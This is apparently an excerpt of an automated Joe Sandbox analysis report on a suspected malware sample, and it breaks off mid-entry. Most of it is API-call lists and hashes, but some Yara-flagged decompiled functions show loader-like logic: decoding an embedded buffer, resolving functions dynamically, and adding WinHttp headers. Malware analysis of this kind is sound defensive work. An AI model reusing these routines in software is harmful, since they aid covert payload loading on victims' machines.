                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 001201B0
                                                                                                                                                                                                                                                                • IsMenu.USER32(?), ref: 001201EC
                                                                                                                                                                                                                                                                • AdjustWindowRectEx.USER32(?,00000000,00000000), ref: 001201FF
                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 0012024C
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Rect$Client$AdjustMenuWindow
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2631253777-0
                                                                                                                                                                                                                                                                • Opcode ID: 39dda6ab25362ab1f0c1cda0284d80c301ad7fc284930d7cb7a7b8b2a5d01419
                                                                                                                                                                                                                                                                • Instruction ID: a04fb2806c8e5392ae1401071c6d4ea2a6d467a055bb92dbf873afc51f6133e3
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 39dda6ab25362ab1f0c1cda0284d80c301ad7fc284930d7cb7a7b8b2a5d01419
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 32319571E00229AFCB05EFA4E899D7FBBB8FF58710F00415AE905A7201DB709E10CB91
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • EnableMenuItem.USER32(00000000,?,?), ref: 0011D298
                                                                                                                                                                                                                                                                • GetFocus.USER32 ref: 0011D2B0
                                                                                                                                                                                                                                                                • GetParent.USER32(?), ref: 0011D2BE
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000028,00000000,00000000), ref: 0011D2D3
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: EnableFocusItemMenuMessageParentSend
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2297321873-0
                                                                                                                                                                                                                                                                • Opcode ID: 2a59ad2c3526a794e1fff9b8dd914097c741ec8b57fce9a8cfacc67bdbafb664
                                                                                                                                                                                                                                                                • Instruction ID: fda84175ec1c42d0271a53bc472cad460c7671a3f4a80f3eaa851463fc3decfd
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2a59ad2c3526a794e1fff9b8dd914097c741ec8b57fce9a8cfacc67bdbafb664
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2931A431600615EFCB28AF64E885FAAB7B9FF55311F108639F42697690DB70EC90CB91
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetParent.USER32(?), ref: 001305C2
                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 00130609
                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 0013064F
                                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000007), ref: 00130663
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Rect$ClientMetricsParentSystemWindow
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2120119201-0
                                                                                                                                                                                                                                                                • Opcode ID: 1d89584bd5237ea3981248d66a2753eac44ae932f4e232a42b8fdef6608546b7
                                                                                                                                                                                                                                                                • Instruction ID: d2a0b0a1fe2371f5c9c8f07197009fd7ac86970e1a47b5f1fb2681cabad5957f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1d89584bd5237ea3981248d66a2753eac44ae932f4e232a42b8fdef6608546b7
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8831F4B1D002199FCF05EFA8E8959EEBBF5FF49300B10416AE905EB215DB71A911CFA0
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SetRectEmpty.USER32(00000000), ref: 00129C64
                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,00000000), ref: 00129C84
                                                                                                                                                                                                                                                                • GetParent.USER32(?), ref: 00129CA3
                                                                                                                                                                                                                                                                • OffsetRect.USER32(00000000,00000000,00000000), ref: 00129D27
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Rect$ClientEmptyOffsetParent
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3819956977-0
                                                                                                                                                                                                                                                                • Opcode ID: 26000f301da31117d6e4359b79bb98efe41de64d8598c4791e4ab7834b25e5a2
                                                                                                                                                                                                                                                                • Instruction ID: 2330789d7bd207e09db4601da890f2e1b7bba4927f65acb8ef85a767f7e333ed
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 26000f301da31117d6e4359b79bb98efe41de64d8598c4791e4ab7834b25e5a2
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 83310736200616EFD718DF69F894E65B7A4FF45720B14822EF909CB295DB30EC60CBA0
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetParent.USER32(?), ref: 0013364A
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 001336D6
                                                                                                                                                                                                                                                                • GetParent.USER32(?), ref: 001336E6
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000111), ref: 00133711
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageParentSend
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 928151917-0
                                                                                                                                                                                                                                                                • Opcode ID: 112b4f02910a94edd0a51a692936b94d72f03e4d6c754c5604155e7f0390696a
                                                                                                                                                                                                                                                                • Instruction ID: 3b13af287068f8de1d89b39abefb9dc41a1f2fe8fc74f800528f0195425919bb
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 112b4f02910a94edd0a51a692936b94d72f03e4d6c754c5604155e7f0390696a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D821F7B2D04210BFDF257BB1AC8AA6E7BA5FB48710F10063EF966D7151EB308A409B14
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SetBkColor.GDI32(00000000,?), ref: 0012EFD4
                                                                                                                                                                                                                                                                • ExtTextOutW.GDI32(00000000,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 0012EFE9
                                                                                                                                                                                                                                                                • CreatePatternBrush.GDI32(00000000), ref: 0012F04E
                                                                                                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 0012F05A
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: BrushColorCreateDeleteObjectPatternText
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1519795524-0
                                                                                                                                                                                                                                                                • Opcode ID: c490f3ddd7559cbc8e0bcfc2c357fbbd7c9cc86c9ac9a8852d43bc64cb881bce
                                                                                                                                                                                                                                                                • Instruction ID: 59c7760b785d79c06d71fda748629ca197726bb0ba93953507040624bcf89a6d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c490f3ddd7559cbc8e0bcfc2c357fbbd7c9cc86c9ac9a8852d43bc64cb881bce
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 57212535601628AFDB25AB64FD0DFBF77A9EB95B11F004039F80682191CB704D91CBA2
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CoInitialize.OLE32(00000000), ref: 00129765
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Initialize
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2538663250-0
                                                                                                                                                                                                                                                                • Opcode ID: fb3c23b983ff25cd132e48fd51bec79dca29c17e7bb936499367ea5798d2106f
                                                                                                                                                                                                                                                                • Instruction ID: 019cd97ffe9ec0d8fb06613fd08ae46b7118a5b3c463082ccf532382047a7c78
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fb3c23b983ff25cd132e48fd51bec79dca29c17e7bb936499367ea5798d2106f
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5521CF75250715AFD7246F78FC4AF27BAA8EB81755F00453EF94286290EBB0E9108E61
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000002,?,00000000,?,?,?,001518F1,00000000,00000000,?,000D9C54,000D9C54,?,001526FF,?,00000000), ref: 00151912
                                                                                                                                                                                                                                                                • GlobalFix.KERNEL32(00000000), ref: 0015192A
                                                                                                                                                                                                                                                                • RtlEnterCriticalSection.NTDLL(0028A14C), ref: 0015195F
                                                                                                                                                                                                                                                                • RtlLeaveCriticalSection.NTDLL(0028A14C), ref: 001519C9
                                                                                                                                                                                                                                                                  • Part of subcall function 00118704: __CxxThrowException@8.LIBVCRUNTIME ref: 00118718
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CriticalGlobalSection$AllocEnterException@8LeaveThrow
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1029332213-0
                                                                                                                                                                                                                                                                • Opcode ID: 724066c068ed5444b03a0d4031fb073cf1477f3f53afc7c26b53f41e9bf0609b
                                                                                                                                                                                                                                                                • Instruction ID: 010b997ae2fbe314567d4c8b38c00f02f9af62a684467e684fd49ac9bdb9e040
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 724066c068ed5444b03a0d4031fb073cf1477f3f53afc7c26b53f41e9bf0609b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CF210435601204FBDF12AB64AC5DB6E73AAAB59316F10402AFC05DB251DF74CD44C7A2
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 5171c3cfb9a0c04759a5a9666830faeeadf06a646b0b5635f7a13935b6796fd6
                                                                                                                                                                                                                                                                • Instruction ID: de80885879a7a8f6fff02b0b83b628f397c82c683019612dee20a93c84abc3dd
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5171c3cfb9a0c04759a5a9666830faeeadf06a646b0b5635f7a13935b6796fd6
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5C219231931205FBDB206FE4AC0DF5E7BA4EBC2762F150125E951AB1D0DBB09C18D678
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                C-Code - Quality: 93%
                                                                                                                                                                                                                                                                			E000D12F9(void* __ebx, void* __eflags) {
                                                                                                                                                                                                                                                                				char _v8;
                                                                                                                                                                                                                                                                				void* _v12;
                                                                                                                                                                                                                                                                				char _v524;
                                                                                                                                                                                                                                                                				void _v528;
                                                                                                                                                                                                                                                                				void* __ebp;
                                                                                                                                                                                                                                                                				void* _t46;
                                                                                                                                                                                                                                                                				signed int _t48;
                                                                                                                                                                                                                                                                				void* _t55;
                                                                                                                                                                                                                                                                				void* _t56;
                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                				if(E000D121E( &_v12,  &_v8) == 0) {
                                                                                                                                                                                                                                                                					_t48 = 0;
                                                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                                                						 *(_t56 + _t48 - 0x20c) = ( *(0xd4100 + _t48 * 2) & 0x000000f0 |  *(0xd4101 + _t48 * 2) >> 0x00000004) ^ _t48;
                                                                                                                                                                                                                                                                						_t48 = _t48 + 1;
                                                                                                                                                                                                                                                                					} while (_t48 < 0x204);
                                                                                                                                                                                                                                                                					if(E000D2395(_v528,  &_v524,  &_v12,  &_v8) != 0) {
                                                                                                                                                                                                                                                                						memset( &_v528, 0, 0x204);
                                                                                                                                                                                                                                                                						if(_v8 >= 0x400) {
                                                                                                                                                                                                                                                                							WaitForSingleObject(0xffffffff, 0xea60);
                                                                                                                                                                                                                                                                							_t55 = _v12;
                                                                                                                                                                                                                                                                							_push(0);
                                                                                                                                                                                                                                                                							E000D11E0(__ebx, _t55, _v8);
                                                                                                                                                                                                                                                                							if(_t55 != 0) {
                                                                                                                                                                                                                                                                								HeapFree(GetProcessHeap(), 0, _t55);
                                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                					L11:
                                                                                                                                                                                                                                                                					return 0;
                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                				_t46 = _v12;
                                                                                                                                                                                                                                                                				if( *((intOrPtr*)(_t46 + 5)) != 0 &&  *((intOrPtr*)(_t46 + 1)) != 0) {
                                                                                                                                                                                                                                                                					E000D1000(_t46, _v8);
                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                				goto L11;
                                                                                                                                                                                                                                                                			}












                                                                                                                                                                                                                                                                0x000d130f
                                                                                                                                                                                                                                                                0x000d1336
                                                                                                                                                                                                                                                                0x000d133d
                                                                                                                                                                                                                                                                0x000d1355
                                                                                                                                                                                                                                                                0x000d135c
                                                                                                                                                                                                                                                                0x000d135d
                                                                                                                                                                                                                                                                0x000d137e
                                                                                                                                                                                                                                                                0x000d138a
                                                                                                                                                                                                                                                                0x000d1399
                                                                                                                                                                                                                                                                0x000d13a2
                                                                                                                                                                                                                                                                0x000d13a8
                                                                                                                                                                                                                                                                0x000d13b0
                                                                                                                                                                                                                                                                0x000d13b2
                                                                                                                                                                                                                                                                0x000d13ba
                                                                                                                                                                                                                                                                0x000d13c6
                                                                                                                                                                                                                                                                0x000d13c6
                                                                                                                                                                                                                                                                0x000d13ba
                                                                                                                                                                                                                                                                0x000d1399
                                                                                                                                                                                                                                                                0x000d13cd
                                                                                                                                                                                                                                                                0x000d13d2
                                                                                                                                                                                                                                                                0x000d13d2
                                                                                                                                                                                                                                                                0x000d1311
                                                                                                                                                                                                                                                                0x000d1318
                                                                                                                                                                                                                                                                0x000d132b
                                                                                                                                                                                                                                                                0x000d132b
                                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 000D121E: GetCommandLineA.KERNEL32(-id=), ref: 000D122F
                                                                                                                                                                                                                                                                  • Part of subcall function 000D121E: StrStrIA.KERNELBASE(00000000), ref: 000D1236
                                                                                                                                                                                                                                                                  • Part of subcall function 000D121E: StrToIntA.SHLWAPI(-00000004), ref: 000D1248
                                                                                                                                                                                                                                                                  • Part of subcall function 000D121E: GetTempPathA.KERNEL32(00000104,?), ref: 000D125D
                                                                                                                                                                                                                                                                  • Part of subcall function 000D121E: wsprintfA.USER32 ref: 000D1275
                                                                                                                                                                                                                                                                  • Part of subcall function 000D121E: GetProcessHeap.KERNEL32(00000000,?), ref: 000D12CA
                                                                                                                                                                                                                                                                  • Part of subcall function 000D121E: HeapFree.KERNEL32(00000000), ref: 000D12D1
                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 000D138A
                                                                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(000000FF,0000EA60), ref: 000D13A2
                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 000D13BF
                                                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 000D13C6
                                                                                                                                                                                                                                                                  • Part of subcall function 000D1000: LoadLibraryA.KERNEL32(KERNEL32.DLL,?,00000400,?), ref: 000D102E
                                                                                                                                                                                                                                                                  • Part of subcall function 000D1000: GetProcAddress.KERNEL32(00000000), ref: 000D1035
                                                                                                                                                                                                                                                                  • Part of subcall function 000D1000: LoadLibraryA.KERNEL32(KERNEL32.DLL,?), ref: 000D107C
                                                                                                                                                                                                                                                                  • Part of subcall function 000D1000: GetProcAddress.KERNEL32(00000000), ref: 000D1083
                                                                                                                                                                                                                                                                  • Part of subcall function 000D1000: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 000D10C1
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551228989.00000000000D1000.00000020.00020000.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.551211478.00000000000D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.551305946.00000000000D4000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d0000_sample4.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Heap$AddressFreeLibraryLoadProcProcess$CommandFileLineModuleNameObjectPathSingleTempWaitmemsetwsprintf
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1757398554-0
                                                                                                                                                                                                                                                                • Opcode ID: 1a895f98ecc297f9241b9fd762de39c4f23c6d76d40e4fa49635495c8d47440a
                                                                                                                                                                                                                                                                • Instruction ID: 357339b03bbb1f40f77e7ac2723c4bfcefcc62bcc7e1c0bf086c959b44bc3424
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1a895f98ecc297f9241b9fd762de39c4f23c6d76d40e4fa49635495c8d47440a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 84215B35600309BBDB10DBA4DC09BDE7BB69B80310F244297E914A33D2DE745B85CBB0
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                C-Code - Quality: 46%
                                                                                                                                                                                                                                                                			E000D20BA(intOrPtr _a4, intOrPtr _a12) {
                                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                                				char _v12;
                                                                                                                                                                                                                                                                				int _t17;
                                                                                                                                                                                                                                                                				intOrPtr _t25;
                                                                                                                                                                                                                                                                				signed int _t28;
                                                                                                                                                                                                                                                                				void* _t31;
                                                                                                                                                                                                                                                                				intOrPtr _t33;
                                                                                                                                                                                                                                                                				void* _t38;
                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                				_push(_t27);
                                                                                                                                                                                                                                                                				_v8 = _v8 & 0x00000000;
                                                                                                                                                                                                                                                                				_v12 = 4;
                                                                                                                                                                                                                                                                				if(_a12 != 0x10) {
                                                                                                                                                                                                                                                                					L12:
                                                                                                                                                                                                                                                                					return _t17;
                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                				_t17 =  &_v8;
                                                                                                                                                                                                                                                                				__imp__WinHttpQueryOption(_a4, 0x4e, _t17,  &_v12);
                                                                                                                                                                                                                                                                				if(_t17 == 0) {
                                                                                                                                                                                                                                                                					goto L12;
                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                				_t17 = _v8;
                                                                                                                                                                                                                                                                				if(_t17 == 0) {
                                                                                                                                                                                                                                                                					goto L12;
                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                				_t17 =  *(_t17 + 0xc);
                                                                                                                                                                                                                                                                				if(_t17 == 0) {
                                                                                                                                                                                                                                                                					goto L12;
                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                				_t36 =  *((intOrPtr*)(_t17 + 8));
                                                                                                                                                                                                                                                                				if( *((intOrPtr*)(_t17 + 8)) == 0) {
                                                                                                                                                                                                                                                                					L11:
                                                                                                                                                                                                                                                                					return _t17;
                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                				_t33 =  *((intOrPtr*)(_t17 + 0x48));
                                                                                                                                                                                                                                                                				if(_t33 == 0) {
                                                                                                                                                                                                                                                                					L10:
                                                                                                                                                                                                                                                                					goto L11;
                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                				_t25 =  *((intOrPtr*)(_t17 + 0x44));
                                                                                                                                                                                                                                                                				_t31 = 0;
                                                                                                                                                                                                                                                                				_t28 = 0x811c9dc5;
                                                                                                                                                                                                                                                                				if(_t25 == 0) {
                                                                                                                                                                                                                                                                					L8:
                                                                                                                                                                                                                                                                					_t17 = E000D1FE0(_t31, 0 |  *_t36 == (_t28 & 0x7fffffff));
                                                                                                                                                                                                                                                                					_t38 = _t17;
                                                                                                                                                                                                                                                                					if(_t38 != 0) {
                                                                                                                                                                                                                                                                						__imp__WinHttpAddRequestHeaders(_a4, _t38, 0xffffffff, 0xa0000000);
                                                                                                                                                                                                                                                                						_t17 = HeapFree(GetProcessHeap(), 0, _t38);
                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                					goto L10;
                                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                                					goto L7;
                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                				do {
                                                                                                                                                                                                                                                                					L7:
                                                                                                                                                                                                                                                                					_t28 = ( *(_t33 + _t31) & 0x000000ff ^ _t28) * 0x1000193;
                                                                                                                                                                                                                                                                					_t31 = _t31 + 1;
                                                                                                                                                                                                                                                                				} while (_t31 < _t25);
                                                                                                                                                                                                                                                                				goto L8;
                                                                                                                                                                                                                                                                			}











                                                                                                                                                                                                                                                                0x000d20be
                                                                                                                                                                                                                                                                0x000d20bf
                                                                                                                                                                                                                                                                0x000d20c7
                                                                                                                                                                                                                                                                0x000d20ce
                                                                                                                                                                                                                                                                0x000d216a
                                                                                                                                                                                                                                                                0x000d216a
                                                                                                                                                                                                                                                                0x000d216a
                                                                                                                                                                                                                                                                0x000d20d8
                                                                                                                                                                                                                                                                0x000d20e1
                                                                                                                                                                                                                                                                0x000d20e9
                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                0x000d20eb
                                                                                                                                                                                                                                                                0x000d20f0
                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                0x000d20f2
                                                                                                                                                                                                                                                                0x000d20f7
                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                0x000d20fa
                                                                                                                                                                                                                                                                0x000d20ff
                                                                                                                                                                                                                                                                0x000d2166
                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                0x000d2166
                                                                                                                                                                                                                                                                0x000d2102
                                                                                                                                                                                                                                                                0x000d2107
                                                                                                                                                                                                                                                                0x000d2165
                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                0x000d2165
                                                                                                                                                                                                                                                                0x000d210a
                                                                                                                                                                                                                                                                0x000d210d
                                                                                                                                                                                                                                                                0x000d210f
                                                                                                                                                                                                                                                                0x000d2116
                                                                                                                                                                                                                                                                0x000d2129
                                                                                                                                                                                                                                                                0x000d2137
                                                                                                                                                                                                                                                                0x000d213c
                                                                                                                                                                                                                                                                0x000d2142
                                                                                                                                                                                                                                                                0x000d214f
                                                                                                                                                                                                                                                                0x000d215f
                                                                                                                                                                                                                                                                0x000d215f
                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                0x000d2118
                                                                                                                                                                                                                                                                0x000d2118
                                                                                                                                                                                                                                                                0x000d211e
                                                                                                                                                                                                                                                                0x000d2124
                                                                                                                                                                                                                                                                0x000d2125
                                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • WinHttpQueryOption.WINHTTP(00000004,0000004E,00000000,00000004), ref: 000D20E1
                                                                                                                                                                                                                                                                • WinHttpAddRequestHeaders.WINHTTP(00000004,00000000,000000FF,A0000000), ref: 000D214F
                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 000D2158
                                                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 000D215F
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551228989.00000000000D1000.00000020.00020000.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.551211478.00000000000D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.551305946.00000000000D4000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d0000_sample4.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: HeapHttp$FreeHeadersOptionProcessQueryRequest
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3136366819-0
                                                                                                                                                                                                                                                                • Opcode ID: 24400695007b48e50cba999f88c5045fbc713844e118b1a89c6387faa549370d
                                                                                                                                                                                                                                                                • Instruction ID: a0a1313afe1efaf848c09756ec78ca8eaa4a00e28709d107340fc4828f7a3151
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 24400695007b48e50cba999f88c5045fbc713844e118b1a89c6387faa549370d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2911A536601314ABDB108F65DC44FAF7BECEB24721F15822ABB0597290D774D94086B0
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • BeginDeferWindowPos.USER32(00000000), ref: 0012A38F
                                                                                                                                                                                                                                                                • IsWindow.USER32(?), ref: 0012A3AA
                                                                                                                                                                                                                                                                • DeferWindowPos.USER32(00000000,?,00000000,?,00000000,?,00000000,00000000), ref: 0012A3FA
